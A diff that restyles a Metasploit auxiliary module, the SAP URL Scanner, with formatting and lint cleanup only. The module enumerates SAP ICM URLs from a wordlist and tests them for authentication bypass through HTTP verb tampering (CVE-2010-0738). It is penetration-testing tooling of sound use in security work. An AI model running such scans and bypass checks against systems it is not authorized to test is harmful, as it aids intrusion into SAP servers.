@@ -9,38 +9,49 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'            => 'SAP URL Scanner',
-      'Description'   => %q{
-        This module scans for commonly found SAP Internet Communication Manager URLs
-        and outputs return codes for the user.
-      },
-      'Author'          => [ 'Chris John Riley' ],
-      'References'      =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'SAP URL Scanner',
+        'Description' => %q{
+          This module scans for commonly found SAP Internet Communication Manager URLs
+          and outputs return codes for the user.
+        },
+        'Author' => [ 'Chris John Riley' ],
+        'References' => [
           [ 'CVE', '2010-0738' ] # VERB auth bypass
         ],
-      'License'         => MSF_LICENSE
-      ))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
-        OptString.new('VERB',    [true, "Verb for auth bypass testing", "HEAD"]),
-        OptPath.new('URLFILE', [true, "SAP ICM Paths File",
-          File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')])
-      ])
+        OptString.new('VERB', [true, 'Verb for auth bypass testing', 'HEAD']),
+        OptPath.new('URLFILE', [
+          true, 'SAP ICM Paths File',
+          File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')
+        ])
+      ]
+    )
   end
 
   # Base Structure of module borrowed from jboss_vulnscan
-  def run_host(ip)
-     res = send_request_cgi(
+  def run_host(_ip)
+    res = send_request_cgi(
       {
-        'uri'       => "/" + Rex::Text.rand_text_alpha(12),
-        'method'    => 'GET',
-      })
+        'uri' => '/' + Rex::Text.rand_text_alpha(12),
+        'method' => 'GET'
+      }
+    )
 
     if res
-      print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
+      print_status('Note: Please note these URLs may or may not be of interest based on server configuration')
       @info = []
       if res.headers['Server']
         @info << res.headers['Server']
@@ -49,8 +60,8 @@ class MetasploitModule < Msf::Auxiliary
         print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
       end
 
-      if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) )
-        print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
+      if res.body && /class="note">(.*)code:(.*)</i.match(res.body)
+        print_error("#{rhost}:#{rport} SAP ICM error message: #{::Regexp.last_match(2)}")
       end
 
       # Load URLs
@@ -70,13 +81,13 @@ class MetasploitModule < Msf::Auxiliary
       print_error("#{rhost}:#{rport} No response received")
     end
 
-    if @valid_urls.length > 0
+    if !@valid_urls.empty?
       l = store_loot(
         'sap.icm.urls',
-        "text/plain",
+        'text/plain',
         datastore['RHOST'],
         @valid_urls,
-        "icm_urls.txt", "SAP ICM Urls"
+        'icm_urls.txt', 'SAP ICM Urls'
       )
       print_line
       print_good("Stored urls as loot: #{l}") if l
@@ -86,16 +97,14 @@ class MetasploitModule < Msf::Auxiliary
   def check_url(url)
     full_url = write_url(url)
     res = send_request_cgi({
-      'uri'       => normalize_uri(url),
-      'method'    => 'GET',
+      'uri' => normalize_uri(url),
+      'method' => 'GET'
     })
 
-    if (res)
-      if res.headers['Server']
-        unless @info.include?(res.headers['Server'])
-          print_good("New server header seen [#{res.headers['Server']}]")
-          @info << res.headers['Server'] #Add To seen server headers
-        end
+    if res
+      if res.headers['Server'] && !@info.include?(res.headers['Server'])
+        print_good("New server header seen [#{res.headers['Server']}]")
+        @info << res.headers['Server'] # Add To seen server headers
       end
 
       case res.code
@@ -144,12 +153,12 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})")
 
     res = send_request_raw({
-      'uri'       => normalize_uri(url),
-      'method'    => datastore['VERB'],
-      'version'   => '1.0' # 1.1 makes the head request wait on timeout for some reason
+      'uri' => normalize_uri(url),
+      'method' => datastore['VERB'],
+      'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
     })
 
-    if (res && res.code == 200)
+    if res&.code == 200
       print_good("#{full_url} Got authentication bypass via HTTP verb tampering")
     else
       vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
@@ -162,19 +171,19 @@ class MetasploitModule < Msf::Auxiliary
   def check_urlprefixes
     urls = []
     res = send_request_cgi({
-      'uri'       => "/sap/public/icf_info/urlprefix",
-      'method'    => 'GET',
+      'uri' => '/sap/public/icf_info/urlprefix',
+      'method' => 'GET'
     })
 
-    if (res && res.code == 200)
+    if res&.code == 200
       res.body.each_line do |line|
-        if line =~ /PREFIX=/
-          url_enc = line.sub(/^PREFIX=/, '')
-          # Remove CASE and VHOST
-          url_enc = url_enc.sub(/&CASE=.*/, '')
-          url_dec = CGI.unescape(url_enc).sub(/;/, '')
-          urls << url_dec.strip
-        end
+        next unless line =~ /PREFIX=/
+
+        url_enc = line.sub(/^PREFIX=/, '')
+        # Remove CASE and VHOST
+        url_enc = url_enc.sub(/&CASE=.*/, '')
+        url_dec = CGI.unescape(url_enc).sub(/;/, '')
+        urls << url_dec.strip
       end
     else
       print_error("#{rhost}:#{rport} Could not retrieve urlprefixes")
